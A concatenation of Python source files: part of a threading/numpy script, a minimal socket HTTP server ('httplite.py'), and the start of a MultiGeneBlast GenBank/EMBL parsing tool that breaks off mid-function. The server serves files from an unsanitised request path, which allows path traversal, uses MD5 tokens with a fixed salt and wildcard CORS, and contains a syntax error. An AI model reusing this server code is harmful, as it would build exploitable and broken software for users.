#aa = la.inv(big_matrix)
aa = np.linalg.inv(big_matrix)
retval = np.dot(np.dot(global_vect, aa),global_vect)
print('my retval {}'.format(retval))
if __name__ == '__main__':
myarr = [0,0,0,0,0,0,0,0,0,0,0]
lock = Lock()
ps = []
objs = []
for num in range(10):
objs.append(aa(num))
ps.append(Thread(target=objs[-1].f, args=(lock, myarr)))
ps[-1].start()
for num in range(10):
ps[num].join()
print(myarr)
#Matrix stuff
ps = []
nthreads=15
random_mat = np.random.random( (nthreads,nbig,nbig) )
for num in range(nthreads):
ps.append(Thread(target=do_lots, args=(random_mat[num],) ))
ps[-1].start()
for num in range(nthreads):
ps[num].join()
|
httplite.py
|
import socket,threading,os,time,json,hashlib
log = print
global STATIC_DIR
STATIC_DIR = ''
HEADER_CONTENT_TYPE = 'Content-Type:text/html; charset=UTF-8'
class Request():
def __init__(self, orign_request, addr):
self.path = None
self.method = None
self.signature = None
self.headers = dict()
self.body = None
self.orignal_request = orign_request
self.host, self.port = addr
self.__parse_request__(orign_request)
def __parse_request__(self, request):
twopart = [x for x in request.split('\r\n\r\n') if x]
self.__parse_headers_and_signature__(twopart[0])
if len(twopart) == 2:
self.body = twopart[1]
def __parse_headers_and_signature__(self, headers_part):
lines = headers_part.split("\r\n")
self.signature = lines[0]
for header in range(1, len(lines)):
if lines[header].startswith('Host'):
self.headers['Host'] = lines[header].split(":")[1:]
continue
item = lines[header].split(":", 2)
self.headers[item[0]] = item[1].strip()
self.method, self.path, *other = self.signature.split(' ')
class Response():
def __init__(self, status=200, headers={}, body=None, message='ok', RESPONSE_FIRST_VERSION='HTTP/1.0'):
self.status = status
self.headers = headers
self.body = body
self.message = message
self.RESPONSE_FIRST_VERSION = RESPONSE_FIRST_VERSION
@classmethod
def ok(cls, body=None):
res = Response(body=body)
res.body = body
if body:
res.headers['Content-Length'] = str(len(body))
return res
@classmethod
def bad_request(cls):
return Response(status=400, message='Bad Request')
def headers_responses(self):
signature = ' '.join([self.RESPONSE_FIRST_VERSION, str(self.status), self.message])
headers_str = str()
header_of_response = str()
for title, content in self.headers.items():
headers_str += ': '.join([title, content])+'\r\n'
headers_str = headers_str[:-2]
header_of_response += '\r\n'.join([signature, headers_str])+'\r\n\r\n'
return bytes(header_of_response, encoding='utf-8')
def data(self):
body = self.body
response = bytes('', encoding='utf-8')
if body:
response += body
return response
def is_json(myjson):
try:
json_object = json.loads(myjson)
except ValueError:
return False
return True
def read_file(filepath, type_):
with open(filepath, type_) as file:
result = file.read()
return result
def file(page) -> bytes:
path_ = os.path.join(STATIC_DIR, page)
if not os.path.exists(path_):
return read_file(os.path.join(STATIC_DIR, '404.html'), 'rb')
elif not os.access(path_, os.X_OK):
return b'403 Forbidden'
if os.path.isfile(path_):
body = read_file(path_, 'rb')
else:
body = read_file(path_+'/index.html', 'rb')
return body
def handle_get_request(request) -> Response:
path = request.path
if path == '/':
return Response.ok(body=file('index.html'))
return Response.ok(body=file(path[1:]))
def handle_post_request(request) -> Response:
headers = request.headers
path = request.path
body = request.body.split('\r\n')
datas = b'<h1>error<h1>'
if headers['Content-Type'].replace(' ', '') == 'application/json;charset=UTF-8' or headers['Content-Type'].replace(' ', '') == 'application/json;':
error_data = json.dumps({'status': 0, 'message': 'error'})
if path == '/login':
if is_json(body[0]):
# sql 查询
json_data = json.loads(body[0])
token = hashlib.md5( bytes(json_data['username'] + json_data['password']+'passwords',encoding='utf-8') ).hexdigest()
success_data = json.dumps({'status': 1, 'message': 'success', 'token': token})
datas = success_data
else:
datas = error_data
datas = bytes(datas, encoding='utf-8')
if path ='/info':
if is_json(body[0]):
json_data = json.loads(body[0])
user_token = json_data['token']
user_name = json_data['username']
user_pwd = json_data['password']
token = hashlib.md5( bytes(json_data['username'] + json_data['password']+'passwords',encoding='utf-8') ).hexdigest()
if(user_token == token):
# do somethings
pass
return Response.ok(body=datas)
def method_not_support(method) -> Response:
try:
body = file('method_not_support.html')
return Response(405, body=body, message='Method %s Not Allowed' % method)
except FileNotFoundError as e:
return Response.bad_request()
def handle_request(request: Request) -> Response:
if request.method.lower() == 'get':
return handle_get_request(request)
elif request.method.lower() == 'post':
return handle_post_request(request)
elif request.method.lower() == 'options':
return Response().ok()
return method_not_support(request.method.lower())
def after_handle_response(response): # CROS
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers["Access-Control-Allow-Headers"] = ("Content-Type,Content-Length, Authorization, Accept,X-Requested-With")
response.headers["Access-Control-Allow-Methods"] = "PUT,POST,GET,DELETE,OPTIONS"
def accept_socket(sock: socket, addr, REQUEST_MAX_LENGTH=1024 * 1024):
ori_request = sock.recv(REQUEST_MAX_LENGTH)
request = Request(ori_request.decode('utf-8'), addr)
response = handle_request(request)
after_handle_response(response)
response_bytes = response.data()
response_headers_bytes = response.headers_responses()
sock.send(response_headers_bytes)
sock.send(response_bytes)
sock.close()
log(' >>>>[INFO] '+time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) +
' Accept Connection %s:%s %s' % (addr[0], addr[1], request.signature,))
def start(host, port, static_dir='static'):
global _main
global STATIC_DIR
STATIC_DIR = static_dir
_main = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_main.bind((host, port))
_main.listen()
while True:
sock, addr = _main.accept()
threading.Thread(target=accept_socket, args=(sock, addr)).start()
if __name__ == "__main__":
start("0.0.0.0", 9001, 'static')
|
multigeneblast-3.py
|
#!/usr/bin/env python
## Copyright (c) 2012 Marnix H. Medema
## Department of Microbial Physiology / Groningen Bioinformatics Centre
## University of Groningen
## License: GNU General Public License v3 or later
## A copy of GNU GPL v3 should have been included in this software package in LICENSE.txt.
##Imported modules
import os
from os import system
import sys
import time
import multiprocessing
from multiprocessing import Process, freeze_support
import random
import fileinput
global GUI
global OUTBOX
global FRAME
global CURRENTDIR
global MGBPATH
global APPDATA
global TEMP
global DBPATH
#Find path to mgb files if run from another directory
pathfolders = os.environ['PATH'].split(os.pathsep)
pathfolders.reverse()
pathfolders.append(os.getcwd())
pathfolders.reverse()
CURRENTDIR = os.getcwd()
MGBPATH = ""
for folder in pathfolders:
try:
if "read_input_gui.py" in os.listdir(folder) and "guilib.py" in os.listdir(folder) and "empty.xhtml" in os.listdir(folder) and "multigeneblast.py" in os.listdir(folder) and "mgb_gui.py" in os.listdir(folder):
MGBPATH = folder
break
except:
pass
try:
if MGBPATH == "" and os.sep in sys.argv[0] and "read_input_gui.py" in os.listdir(sys.argv[0].rpartition(os.sep)[0]) and "guilib.py" in os.listdir(sys.argv[0].rpartition(os.sep)[0]):
MGBPATH = sys.argv[0].rpartition(os.sep)[0]
os.chdir(MGBPATH)
except:
pass
if MGBPATH == "":
print "Error: Please add the MultiGeneBlast installation directory to your $PATH environment variable before running the executable from another folder."
sys.exit(1)
#Find path to Application Data
if sys.platform == ('win32'):
APPDATA = os.environ['ALLUSERSPROFILE'] + os.sep + 'Application Data'
elif sys.platform == ('darwin'):
APPDATA = os.path.expanduser("~") + "/Library/Application Support"
else:
try:
if os.path.exists(os.getcwd() + os.sep + "multigeneblast_data"):
APPDATA = os.getcwd() + os.sep + "multigeneblast_data"
else:
os.mkdir(os.getcwd() + os.sep + "multigeneblast_data")
APPDATA = os.getcwd() + os.sep + "multigeneblast_data"
except:
try:
if os.path.exists(os.environ['HOME'] + os.sep + "multigeneblast_data"):
APPDATA = os.getcwd() + os.sep + "multigeneblast_data"
else:
os.mkdir(os.environ['HOME'] + os.sep + "multigeneblast_data")
APPDATA = os.environ['HOME'] + os.sep + "multigeneblast_data"
except:
print "No permission to write to installation folder. Please change user or save somewhere else."
sys.exit()
if sys.platform == ('darwin') or sys.platform == ('win32'):
try:
os.mkdir(APPDATA + os.sep + 'MultiGeneBlast')
APPDATA = APPDATA + os.sep + 'MultiGeneBlast'
except:
if os.path.exists(APPDATA + os.sep + 'MultiGeneBlast'):
APPDATA = APPDATA + os.sep + 'MultiGeneBlast'
#Find path to temporary files
if sys.platform == ('win32'):
TEMP = os.environ['TEMP']
elif sys.platform == ('darwin'):
TEMP = os.environ['TMPDIR']
else:
try:
os.mkdir(os.environ['HOME'] + os.sep + ".mgbtemp")
TEMP = os.environ['HOME'] + os.sep + ".mgbtemp"
except:
TEMP = APPDATA
#Set other environment variables
os.environ['EXEC'] = MGBPATH + os.sep + "exec"
os.environ['PATH'] = os.environ['EXEC'] + os.pathsep + os.environ['PATH']
from pysvg.filter import *
from pysvg.gradient import *
from pysvg.linking import *
from pysvg.script import *
from pysvg.shape import *
from pysvg.structure import *
from pysvg.style import *
from pysvg.text import *
from pysvg.builders import *
from string import ascii_letters
import urllib2
from urllib2 import Request,urlopen,URLError,HTTPError
import httplib
from httplib import BadStatusLine,HTTPException
import urllib
import tarfile
import cPickle as pickle
from Tkinter import *
from tkMessageBox import askyesno, showerror
import shutil
class Options(dict):
"""Simple options access class, first step to use Optparse"""
def __init__(self, indict=None):
if indict is None:
indict = {}
dict.__init__(self, indict)
self.__initialized = True
def __getattr__(self, attr):
try:
return self.__getitem__(attr)
except KeyError:
raise AttributeError(attr)
def __setattr__(self, attr, value):
if not self.__dict__.has_key('_Options__initialized'):
return dict.__setattr__(self, attr, value)
elif attr in self:
dict.__setattr__(self, attr, value)
else:
self.__setitem__(attr, value)
##Functions necessary for this script
def get_sequence(fasta):
"""get the description and trimmed dna sequence"""
in_file = open(fasta, 'r')
content = in_file.readlines()
in_file.close()
content2 = []
for i in content:
if i != "":
content2.append(i)
content = content2
while content[0] == "" or content[0] == "\n":
content = content[1:]
header = content[0]
content = content[1:]
content = [x.rstrip() for x in content]
seq = "".join(content)
if ">" not in header or ">" in seq:
print >> sys.stderr, "FASTA file not properly formatted; should be single sequence starting with '>' and sequence name."
sys.exit(1)
return seq
def complement(seq):
complement = {'a': 't', 'c': 'g', 'g': 'c', 't': 'a', 'n': 'n', 'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
complseq = []
for base in seq:
if base in complement.keys():
complbase = complement[str(base)]
complseq.append(complbase)
else:
complbase = 'n'
complseq.append(complbase)
return complseq
def reverse_complement(seq):
seq = list(seq)
seq.reverse()
revcompl = complement(seq)
revcomplstr = str()
for i in revcompl:
revcomplstr = revcomplstr + str(i)
return revcomplstr
def fastaseqlengths(proteins):
names = proteins[0]
seqs = proteins[1]
seqlengths = {}
a = 0
for i in names:
seq = seqs[a]
seqlength = len(seq)
seqlengths[i] = seqlength
a += 1
return seqlengths
def parsegenes(genes):
genedict = {}
genelist = []
joinlist = []
joindict = {}
accessiondict = {}
locustagdict = {}
genenr = 0
for i in genes:
i = i.split(" gene ")[0]
join = "no"
genenr += 1
#Find gene location info for each gene
if "complement" in i.split("\n")[0].lower() and i.split("\n")[0][-1] == ")":
location = i.split("\n")[0]
elif "complement" in i.split("\n")[0].lower() and i.split("\n")[0][-1] != ")":
location = i.split(" /")[0]
while ")" not in location.replace(" ","")[-3:]:
locationlist = location.split("\n")
locationlist = locationlist[:-1]
location = ""
for i in locationlist:
location = location + "i"
location = location.replace("\n","")
location = location.replace(" ","")
elif "join" in i.split("\n")[0].lower() and i.split("\n")[0][-1] == ")":
location = i.split("\n")[0]
elif "join" in i.split("\n")[0].lower() and i.split("\n")[0][-1] != ")":
location = i.split("/")[0]
while ")" not in location.replace(" ","")[-3:]:
locationlist = location.split("\n")
locationlist = locationlist[:-1]
location = ""
for i in locationlist:
location = location + "i"
location = location.replace("\n","")
location = location.replace(" ","")
else:
location = i.split("\n")[0]
#location info found in embl file, now extract start and end positions
if "complement" in location.lower():
location = location.lower()
location = location.split("complement(")[1][:-1]
if "join(" in location.lower():
join = "yes"
location = location.lower()
location2 = location.split("join(")[1][:-1]
start = location2.split(",")[0]
start = start.split("..")[0]
start = start.replace("<","")
end = location2.split(",")[-1]
if ".." in end:
end = end.split("..")[1]
end = end.replace(">","")
joinedparts = location2.split(",")
joinedparts2 = []
for j in joinedparts:
newjoinedpart = j.replace("<","")
newjoinedpart = newjoinedpart.replace(">","")
joinedparts2.append(newjoinedpart)
else:
start = location.split("..")[0]
start = start.replace("<","")
end = location.split("..")[1]
end = end.replace(">","")
strand = "-"
else:
if "join(" in location.lower():
join = "yes"
location = location.lower()
location2 = location.split("join(")[1][:-1]
start = location2.split(",")[0]
start = start.split("..")[0]
start = start.replace("<","")
end = location2.split(",")[-1]
if ".." in end:
end = end.split("..")[1]
end = end.replace(">","")
joinedparts = location2.split(",")
joinedparts2 = []
for j in joinedparts:
newjoinedpart = j.replace("<","")
newjoinedpart = newjoinedpart.replace(">","")
joinedparts2.append(newjoinedpart)
else:
start = location.split("..")[0]
start = start.replace("<","")
end = location.split("..")[1]
end = end.replace(">","")
strand = "+"
if int(start) > int(end):
start2 = end
end2 = start
start = start2
end = end2
#Correct for alternative codon start positions
if "codon_start=" in i.lower():
codonstart = i.lower().split("codon_start=")[1][0]
if strand == "+":
start = str(int(start) + (int(codonstart) - 1))
elif strand == "-":
end = str(int(end) - (int(codonstart) - 1))
#Find gene name for each gene, preferably locus_tag, than gene, than protein_ID
a = 0
b = 0
genename = ""
nrlines = len(i.split("\n"))
while b == 0:
line = i.split("\n")[a]
if "protein_id=" in line:
genename = (line.split("protein_id=")[1][1:-1]).replace(" ","_")
genename = genename.replace("\\","_")
genename = genename.replace("/","_")
genename = genename.replace('"','')
b += 1
elif "protein_id=" in line.lower():
genename = (line.lower().split("protein_id=")[1][1:-1]).replace(" ","_")
genename = genename.replace("\\","_")
genename = genename.replace("/","_")
genename = genename.replace('"','')
b += 1
elif a == (nrlines - 1):
genename = ""
b += 1
else:
a += 1
if len(genename) > 1:
accnr = genename
else:
accnr = "no_accession_number_found"
#Find gene name or locus tag
a = 0
b = 0
while b == 0:
line = i.split("\n")[a]
locustag = ""
if "locus_tag=" in line:
locustag = (line.split("locus_tag=")[1][1:-1]).replace(" ","_")
locustag = locustag.replace("\\","_")
locustag = locustag.replace("/","_")
locustag = locustag.replace('"','')
b += 1
elif "locus_tag=" in line.lower():
locustag = (line.lower().split("locus_tag=")[1][1:-1]).replace(" ","_")
locustag = locustag.replace("\\","_")
locustag = locustag.replace("/","_")
locustag = locustag.replace('"','')
b += 1
elif a == (nrlines - 1):
if locustag == "":
locustag = "none"
b += 1
else:
a += 1
a = 0
b = 0
while b == 0:
line = i.split("\n")[a]
if "gene=" in line:
genename = (line.split("gene=")[1][1:-1]).replace(" ","_")
genename = genename.replace("\\","_")
genename = genename.replace("/","_")
genename = genename.replace('"','')
b += 1
elif "gene=" in line.lower():
genename = (line.lower().split("gene=")[1][1:-1]).replace(" ","_")
genename = genename.replace("\\","_")
genename = genename.replace("/","_")
genename = genename.replace('"','')
b += 1
elif a == (nrlines - 1):
if genename == "":
genename = "none"
b += 1
else:
a += 1
if locustag != "none":
locustagdict[accnr.rpartition(".")[0]] = locustag
if accnr == "no_accession_number_found" and locustag != "none":
accnr = locustag
genename = locustag
#Find sequence for each gene
a = 0 ###Not all gbks contain protein sequences as translations, therefore sequences from gene clusters are now extracted from the database at a later stage if sequence is not in gbk
b = 0
sequence = ""
while b < 2:
line = i.split("\n")[a]
if "translation=" in line:
sequence = line.split("translation=")[1][1:]
b += 1
a += 1
if line.count('"') > 1:
sequence = line.split("translation=")[1][1:-1]
b = 2
elif "translation=" in line.lower():
sequence = line.lower().split("translation=")[1][1:]
b += 1
a += 1
if line.count('"') > 1:
sequence = line.lower().split("translation=")[1][1:-1]
b = 2
elif a == (nrlines - 2) or a == (nrlines - 1):
sequence = ""
b = 2
elif b == 1:
if '"' in line:
seqline = line.replace(" ","")
seqline = seqline.split('"')[0]
sequence = sequence + seqline
b += 1
else:
seqline = line.replace(" ","")
sequence = sequence + seqline
a += 1
else:
a += 1
sequence = sequence.upper()
#Quality-check sequence
forbiddencharacters = ["'",'"','=',';',':','[',']','>','<','|','\\',"/",'*','-','_','.',',','?',')','(','^','#','!','`','~','+','{','}','@','$','%','&']
for z in forbiddencharacters:
if z in sequence:
sequence = ""
#Find annotation for each gene
a = 0
b = 0
while b == 0:
line = i.split("\n")[a]
if "product=" in line:
annotation = line.split("product=")[1][1:]
annotation = annotation.replace(" ","_")
if annotation[-1] == '"':
annotation = annotation[:-1]
b += 1
elif "product=" in line.lower():
annotation = line.lower().split("product=")[1][1:]
annotation = annotation.replace(" ","_")
if annotation[-1] == '"':
annotation = annotation[:-1]
b += 1
elif a == (nrlines - 1):
annotation = "not_annotated"
b += 1
else:
a += 1
accessiondict[genename] = accnr
if join == "yes":
joinlist.append(genename)
joindict[genename] = joinedparts2
#Remove illegal chars
illegal_chars = '''!"#$%&()*+,:;=>?@[]^`'{|} '''
genename = "".join([char for char in genename if char not in illegal_chars])
if len(genename) < 2:
genename = "orf" + "_" + str(genenr)
#Save data to dictionary
if len(genename) > 1:
genedict[genename] = [start,end,strand,annotation,sequence,accnr,genename]
genelist.append(genename)
return [genelist, genedict, joinlist, joindict, accessiondict, locustagdict]
def cleandnaseq(dnaseq):
dnaseq = dnaseq.replace(" ","")
dnaseq = dnaseq.replace("\t","")
dnaseq = dnaseq.replace("\n","")
dnaseq = dnaseq.replace("0","")
dnaseq = dnaseq.replace("1","")
dnaseq = dnaseq.replace("2","")
dnaseq = dnaseq.replace("3","")
dnaseq = dnaseq.replace("4","")
dnaseq = dnaseq.replace("5","")
dnaseq = dnaseq.replace("6","")
dnaseq = dnaseq.replace("7","")
dnaseq = dnaseq.replace("8","")
dnaseq = dnaseq.replace("9","")
dnaseq = dnaseq.replace("/","")
return dnaseq
def extractprotfasta(genelist,genedict,dnaseq,rc_dnaseq,joinlist,joindict,accessiondict, locustagdict):
names = []
seqs = []
for i in genelist:
genename = i
if locustagdict.has_key(genename):
locustag = locustagdict[genename]
elif locustagdict.has_key(genename.partition(".")[0]):
locustag = locustagdict[genename.partition(".")[0]]
elif accessiondict.has_key(genename.partition(".")[0]) and locustagdict.has_key(accessiondict[genename].partition(".")[0]):
locustag = locustagdict[accessiondict[genename].partition(".")[0]]
elif accessiondict.has_key(genename) and locustagdict.has_key(accessiondict[genename]):
locustag = locustagdict[accessiondict[genename]]
else:
locustag = "no_locus_tag"
#If suitable translation found in gbk, use that
if len(genedict[i][4]) > 5:
protseq = genedict[i][4]
i = genedict[i]
#If no suitable translation found in gbk, extract from DNA sequence
else:
i = genedict[i]
y = int(i[0])
z = int(i[1])
if i[2] == "+":
if genename in joinlist:
geneseq = ""
for j in joindict[genename]:
partstart = int(j.split("..")[0])
if ".." in j:
partend = int(j.split("..")[1])
else:
partend = int(j)
geneseqpart = dnaseq[(partstart - 1):partend]
geneseq = geneseq + geneseqpart
else:
geneseq = dnaseq[(y - 1):z]
protseq = translate(geneseq)
elif i[2] == "-":
if genename in joinlist:
geneseq = ""
joinlistrev = joindict[genename]
joinlistrev.reverse()
for j in joinlistrev:
partstart = int(j.split("..")[0])
if ".." in j:
partend = int(j.split("..")[1])
else:
partend = int(j)
geneseqpart = rc_dnaseq[(len(rc_dnaseq) - partend):(len(rc_dnaseq) - partstart + 1)]
geneseq = geneseq + geneseqpart
else:
geneseq = rc_dnaseq[(len(rc_dnaseq) - z):(len(rc_dnaseq) - y + 1)]
protseq = translate(geneseq)
genedict[genename] = i[:-1] + [locustag]
name = "input" + "|" + "c1" + "|" + i[0] + "-" + i[1] + "|" + i[2] + "|" + genename + "|" + i[3] + "|" + i[5] + "|" + locustag
seqs.append(protseq)
names.append(name)
proteins = [names,seqs,genelist,genedict,accessiondict]
return proteins
def gbk2proteins(gbkfile):
try:
file = open(gbkfile,"r")
except:
print "Error: no or invalid input file: " + gbkfile
sys.exit(1)
filetext = file.read()
filetext = filetext.replace("\r","\n")
if " CDS " not in filetext or "\nORIGIN" not in filetext:
print >> sys.stderr, "Exit: GBK file not properly formatted, no sequence found"
sys.exit(1)
cdspart = filetext.split("\nORIGIN")[0]
#Extract DNA sequence and calculate reverse complement of it
dnaseq = filetext.split("\nORIGIN")[1]
dnaseq = cleandnaseq(dnaseq)
dnaseqlength = len(dnaseq)
rc_dnaseq = reverse_complement(dnaseq)
#Extract genes
genes = cdspart.split(" CDS ")
genes = genes[1:]
genesdetails = parsegenes(genes)
genelist = genesdetails[0]
genedict = genesdetails[1]
joinlist = genesdetails[2]
joindict = genesdetails[3]
accessiondict = genesdetails[4]
locustagdict = genesdetails[5]
#Locate all genes on DNA sequence and translate to protein sequence
proteins = extractprotfasta(genelist, genedict, dnaseq, rc_dnaseq, joinlist, joindict, accessiondict, locustagdict)
textlines = filetext.split("\n//")[0]
textlines = textlines.split("\n")
accession = ""
definition = ""
definitionfound = "n"
for i in textlines:
if accession == "":
if "LOCUS " in i:
j = i.split("LOCUS ")[1]
accession = j.split(" ")[0]
if len(accession) < 4:
accession = ""
if definition == "":
if "DEFINITION " in i:
j = i.split("DEFINITION ")[1]
definition = j
definitionfound = "y"
if definitionfound == "y":
if " " in i:
definitionfound = "n"
definition = definition + i.split(" ")[1]
else:
definitionfound = "n"
#Test if accession number is probably real GenBank/RefSeq acc nr
if testaccession(accession) == "n":
accession = ""
return [proteins, accession, dnaseqlength, definition]
def parse_dna_from_embl(embl_string):
"Parse DNA sequence from EMBL input"
seq_array = []
lines = embl_string.split('\n')
for line in lines:
if line.lower().find('sequence') > -1:
continue
line = line.strip()
line = line.rstrip('0123456789')
line = line.rstrip('/')
line = line.strip()
seq_array.append(line)
return "".join(seq_array)
def embl2proteins(emblfile):
try:
file = open(emblfile,"r")
except:
print "Error: no or invalid input file: " + emblfile
sys.exit(1)
filetext = file.read()
filetext = filetext.replace("\r","\n")
if "FT CDS " not in filetext or ("\nSQ" not in filetext):
log("Exit: EMBL file not properly formatted, no sequence found or no " \
"CDS annotation found.", exit=True)
cdspart = filetext.split("\nSQ ")[0]
#Extract DNA sequence and calculate reverse complement of it
dnaseq = parse_dna_from_embl(filetext.split("\nSQ ")[1])
dnaseq = cleandnaseq(dnaseq)
sequence = dnaseq
if (sequence.count('N') + sequence.count('n') + sequence.count('A') + sequence.count('a') + sequence.count('C') + sequence.count('c') + sequence.count('G') + sequence.count('g') + sequence.count('T') + sequence.count('t')) < (0.5 * len(sequence)):
log("Protein GBK/EMBL file provided. Please provide nucleotide " \
"GBK/EMBL file.", exit=True)
dnaseqlength = len(dnaseq)
rc_dnaseq = reverse_complement(dnaseq)
if dnaseqlength < 1:
log("No sequence found in GBK/EMBL file. Please provide an annotated " \
"nucleotide GBK/EMBL file with a DNA sequence.", exit=True)
#Extract genes
genes = cdspart.split("FT CDS ")
genes = genes[1:]
genesdetails = parsegenes(genes)
genelist = genesdetails[0]
genedict = genesdetails[1]
joinlist = genesdetails[2]
joindict = genesdetails[3]
accessiondict = genesdetails[4]
locustagdict = genesdetails[5]
#Locate all genes on DNA sequence and translate to protein sequence
proteins = extractprotfasta(genelist, genedict, dnaseq, rc_dnaseq, joinlist, joindict, accessiondict, locustagdict)
textlines = filetext.split("SQ ")[0]
textlines = textlines.split("\n")
accession = ""
definition = ""
for i in textlines:
if accession == "":
if "AC " in i:
j = i.split("AC ")[1]
j = j.replace(" ","")
accession = j.split(";")[0]
if len(accession) < 4:
accession = ""
if definition == "":
if "DE " in i:
j = i.split("DE ")[1]
definition = j
#Test if accession number is probably real GenBank/RefSeq acc nr
if testaccession(accession) == "n":
accession = ""
return [proteins, accession, dnaseqlength, definition]
def translate(sequence):
#Translation table standard genetic code; according to http://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi
transldict = { 'TTT': 'F', 'TCT': 'S', 'TAT': 'Y', 'TGT': 'C',
'TTC': 'F', 'TCC': 'S', 'TAC': 'Y', 'TGC': 'C',
'TTA': 'L', 'TCA': 'S', 'TAA': '*', 'TGA': '*',
'TTG': 'L', 'TCG': 'S', 'TAG': '*', 'TGG': 'W',
'CTT': 'L', 'CCT': 'P', 'CAT': 'H', 'CGT': 'R',
'CTC': 'L', 'CCC': 'P', 'CAC': 'H', 'CGC': 'R',
'CTA': 'L', 'CCA': 'P', 'CAA': 'Q', 'CGA': 'R',
'CTG': 'L', 'CCG': 'P', 'CAG': 'Q', 'CGG': 'R',
'ATT': 'I', 'ACT': 'T', 'AAT': 'N', 'AGT': 'S',
'ATC': 'I', 'ACC': 'T', 'AAC': 'N', 'AGC': 'S',
'ATA': 'I', 'ACA': 'T', 'AAA': 'K', 'AGA': 'R',
'ATG': 'M', 'ACG': 'T', 'AAG': 'K', 'AGG': 'R',
'GTT': 'V', 'GCT': 'A', 'GAT': 'D', 'GGT': 'G',
'GTC': 'V', 'GCC': 'A', 'GAC': 'D', 'GGC': 'G',
'GTA': 'V', 'GCA': 'A', 'GAA': 'E', 'GGA': 'G',
'GTG': 'V', 'GCG': 'A', 'GAG': 'E', 'GGG': 'G',
'ttt': 'F', 'tct': 'S', 'tat': 'Y', 'tgt': 'C',
'ttc': 'F', 'tcc': 'S', 'tac': 'Y', 'tgc': 'C',
'tta': 'L', 'tca': 'S', 'taa': '*', 'tga': '*',
'ttg': 'L', 'tcg': 'S', 'tag': '*', 'tgg': 'W',
'ctt': 'L', 'cct': 'P', 'cat': 'H', 'cgt': 'R',
'ctc': 'L', 'ccc': 'P', 'cac': 'H', 'cgc': 'R',
'cta': 'L', 'cca': 'P', 'caa': 'Q', 'cga': 'R',
'ctg': 'L', 'ccg': 'P', 'cag': 'Q', 'cgg': 'R',
'att': 'I', 'act': 'T', 'aat': 'N', 'agt': 'S',
'atc': 'I', 'acc': 'T', 'aac': 'N', 'agc': 'S',
'ata': 'I', 'aca': 'T', 'aaa': 'K', 'aga': 'R',
'atg': 'M', 'acg': 'T', 'aag': 'K', 'agg': 'R',
'gtt': 'V', 'gct': 'A', 'gat': 'D', 'ggt': 'G',
'gtc': 'V', 'gcc': 'A', 'gac': 'D', 'ggc': 'G',
'gta': 'V', 'gca': 'A', 'gaa': 'E', 'gga': 'G',
'gtg': 'V', 'gcg': 'A', 'gag': 'E', 'ggg': 'G'}
triplets = []
triplet = ""
a = 0
for i in sequence:
if a < 2:
a += 1
triplet = triplet + i
elif a == 2:
triplet = triplet + i
triplets.append(triplet)
triplet = ""
a = 0
protseq = ""
aanr = 0
for i in triplets:
aanr += 1
if aanr == 1:
protseq = protseq + "M"
else:
if "n" in i or "N" in i or i not in transldict.keys():
protseq = protseq + "X"
else:
protseq = protseq + transldict[i]
if len(protseq) > 0 and protseq[-1] == "*":
protseq = protseq[:-1]
return protseq
def writefasta(names,seqs,file):
e = 0
f = len(names) - 1
try:
out_file = open(file,"w")
while e <= f:
out_file.write(">")
out_file.write(names[e])
out_file.write("\n")
out_file.write(seqs[e])
out_file.write("\n")
e += 1
out_file.close()
except(IOError,OSError,NotImplementedError):
print >> sys.stderr, "FASTA file not created."
def testaccession(accession):
#Test if accession number is probably real GenBank/RefSeq acc nr
numbers = range(0,10)
letters = []
for i in ascii_letters:
letters.append(i)
nrnumbers = 0
nrletters = 0
for i in accession:
if i in letters:
nrletters += 1
try:
j = int(i)
if j in numbers:
nrnumbers += 1
except:
pass
test = "y"
if nrnumbers < 3 or nrletters < 1:
test = "n"
return test
def sortdictkeysbyvalues(dict):
items = [(value, key) for key, value in dict.items()]
items.sort()
return [key for value, key in items]
def sortdictvaluesbykeys(dict):
items = [(key, value) for key, value in dict.items()]
items.sort()
return [value for key, value in items]
def sortdictkeysbyvaluesrev(dict):
items = [(value, key) for key, value in dict.items()]
items.sort()
items.reverse()
return [key for value, key in items]
def sortdictkeysbyvaluesrevv(dict):
items = [(value, key) for key, value in dict.items()]
items.sort()
items.reverse()
return [value for value, key in items]
def blastparse(blasttext, minseqcoverage, minpercidentity, seqlengths, seqdict, dbname, dbtype):
blastdict = {}
querylist = []
blastlines = blasttext.split("\n")[:-1]
#Filter for best blast hits (of one query on each subject)
query_subject_combinations = []
blastlines2 = []
for i in blastlines:
tabs = i.split("\t")
query = tabs[0]
subject = tabs[1]
query_subject_combination = query + "_" + subject
if query_subject_combination in query_subject_combinations:
pass
else:
query_subject_combinations.append(query_subject_combination)
blastlines2.append(i)
blastlines = blastlines2
frame_update()
#Filters blastlines to get rid of hits that do not meet criteria
blastlines2 = []
for i in blastlines:
tabs = i.split("\t")
query = tabs[0]
subject = tabs[1]
perc_ident = int(tabs[2].split(".")[0])
alignmentlength = float(tabs[3])
evalue = str(tabs[10])
blastscore = int(tabs[11].split(".")[0])
if seqlengths.has_key(query):
perc_coverage = (float(tabs[3]) / seqlengths[query]) * 100
else:
perc_coverage = 0
print seqlengths
print "Error: no sequence length found for", query
sys.exit()
if perc_ident > minpercidentity and (perc_coverage > minseqcoverage or alignmentlength > 40):
blastlines2.append(i)
blastlines = blastlines2
#Goes through the blastlines. For each query, creates a querydict and hitlist, and adds these to the blastdict when finding the next query
firstquery = "y"
hitnr = 1
for i in blastlines:
frame_update()
tabs = i.split("\t")
query = tabs[0]
if dbtype == "prot":
subject = tabs[1].split("|")[3].split(".")[0]
else:
subject = tabs[1] + "_" + str(hitnr)
internalblast = "n"
if subject == "+" or subject == "-":
internalblast = "y"
subject = tabs[1].split("|")[4].split(".")[0]
perc_ident = int(tabs[2].split(".")[0])
alignmentlength = float(tabs[3])
hit_start = str(tabs[8])
hit_end = str(tabs[9])
evalue = str(tabs[10])
blastscore = int(tabs[11].split(".")[0])
if seqlengths.has_key(query):
perc_coverage = (float(tabs[3]) / seqlengths[query]) * 100
else:
seqlength = len(seqdict[query.split("|")[4]])
perc_coverage = (float(tabs[3]) / seqlength) * 100
if firstquery == "y": #Only until the first blastline with good hit
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y":
firstquery = "n"
querylist.append(query)
subjectlist = []
querydict = {}
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
last_query = query
